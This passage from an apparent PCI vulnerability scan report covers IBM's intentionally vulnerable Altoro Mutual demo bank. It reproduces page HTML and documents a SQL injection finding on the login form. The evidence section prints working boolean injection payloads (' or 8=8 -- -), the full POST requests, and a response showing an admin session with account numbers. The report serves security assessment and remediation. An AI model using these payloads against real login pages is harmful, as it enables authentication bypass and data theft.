<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 104 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5"
href="index.jsp?content=personal_investments.htm">Investments
&amp; Insurance</a></li>
<li><a id="MenuHyperLink6"
href="index.jsp?content=personal_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink2" class="subheader"


href="index.jsp?content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7"
href="index.jsp?content=business_deposit.htm">Deposit
Products</a></li>
<li><a id="MenuHyperLink8"
href="index.jsp?content=business_lending.htm">Lending
Services</a></li>
<li><a id="MenuHyperLink9"
href="index.jsp?content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10"
href="index.jsp?content=business_insurance.htm">Insurance</a></li
>
<li><a id="MenuHyperLink11"
href="index.jsp?content=business_retirement.htm">Retirement</a><
/li>
<li><a id="MenuHyperLink12"
href="index.jsp?content=business_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink3" class="subheader"


href="index.jsp?content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 105 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

<!-- To get the latest admin login, please contact


SiteOps at 415-555-6159 -->
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>
Username:
</td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 106 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<td>
<input type="text" id="uid" name="uid"
value="" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" id="passw" name="
passw" style="width: 150px;">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" name="btnSubmit"
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 107 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
document.login.passw.focus();
}
}

function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 108 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 109 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights reserved.


</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

7 SQL Injection Vulnerability 7.5 High Fail URL: https://65.61.137.117:8443/doLogin


Port: tcp/8443

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 110 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://65.61.137.117:8443/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://65.61.137.117:8443/doLogin HTTP/1.1
Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 111 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6706
Date: Tue, 06 Aug 2019 04:38:32 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 112 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 113 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">


<!-- MEMBER TOC BEGIN -->

<table cellspacing="0" width="100%">

<td valign="top" class="cc br bb">


<br style="line-height: 10px;"/>
<b>I WANT TO ...</b>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="/bank/main.jsp">View
Account Summary</a></li>
<li><a id="MenuHyperLink2" href="/bank/transaction.jsp"
>View Recent Transactions</a></li>
<li><a id="MenuHyperLink3" href="/bank/transfer.jsp"
>Transfer Funds</a></li>
<!-- <li><a id="MenuHyperLink3" href="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 114 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
/bank/stocks.jsp">Trade Stocks</a></li>-->

<li><a id="MenuHyperLink4" href="/bank/queryxpath.jsp"


>Search News Articles</a></li>
<li><a id="MenuHyperLink5" href="/bank/customize.jsp"
>Customize Site Language</a></li>
</ul>

<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>

</ul>
</span>

</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">

<div class="fl" style="width: 99%;">

<h1>Hello Admin User


</h1>

<p>
Welcome to Altoro Mutual Online.
</p>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 115 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<form name="details" method="get" action="
showAccount">
<table border="0">
<TR valign="top">
<td>View Account Details:</td>
<td align="left">
<select size="1" name="listAccounts" id="
listAccounts">
<option value="800000" >800000
Corporate</option>
<option value="800001" >800001 Checking</option>
<option value="800002" >800002 Savings</option>
<option value="800003" >800003 Checking</option>
<option value="800004" >800004 Savings</option>
<option value="800005" >800005 Checking</option>
<option value="800006" >800006 Savings</option>
<option value="800007" >800007 Checking</option>
<option value="4539082039396288" >4539082039396288 Credit
Card</option>
<option value="4485983356242217" >4485983356242217 Credit
Card</option>

</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 116 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
href='apply.jsp'>Here</a> to apply.
</td></tr></table></span></td>
</tr>
</table>
</form>

</div>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 117 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->
False Request: POST https://65.61.137.117:8443/doLogin HTTP/1.1
Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/login.jsp

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 118 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:38:32 GMT

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 119 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 120 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 121 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5"
href="index.jsp?content=personal_investments.htm">Investments
&amp; Insurance</a></li>
<li><a id="MenuHyperLink6"
href="index.jsp?content=personal_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink2" class="subheader"


href="index.jsp?content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7"
href="index.jsp?content=business_deposit.htm">Deposit
Products</a></li>
<li><a id="MenuHyperLink8"
href="index.jsp?content=business_lending.htm">Lending
Services</a></li>
<li><a id="MenuHyperLink9"
href="index.jsp?content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10"
href="index.jsp?content=business_insurance.htm">Insurance</a></li
>
<li><a id="MenuHyperLink11"
href="index.jsp?content=business_retirement.htm">Retirement</a><
/li>
<li><a id="MenuHyperLink12"
href="index.jsp?content=business_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink3" class="subheader"


href="index.jsp?content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 122 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">


<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

<!-- To get the latest admin login, please contact


SiteOps at 415-555-6159 -->
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>
Username:
</td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 123 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<td>
<input type="text" id="uid" name="uid"
value="" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" id="passw" name="
passw" style="width: 150px;">
</td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" name="btnSubmit"
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 124 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
document.login.passw.focus();
}
}

function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 125 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 126 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights reserved.


</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
This web site responded with content that suggests that the SQL
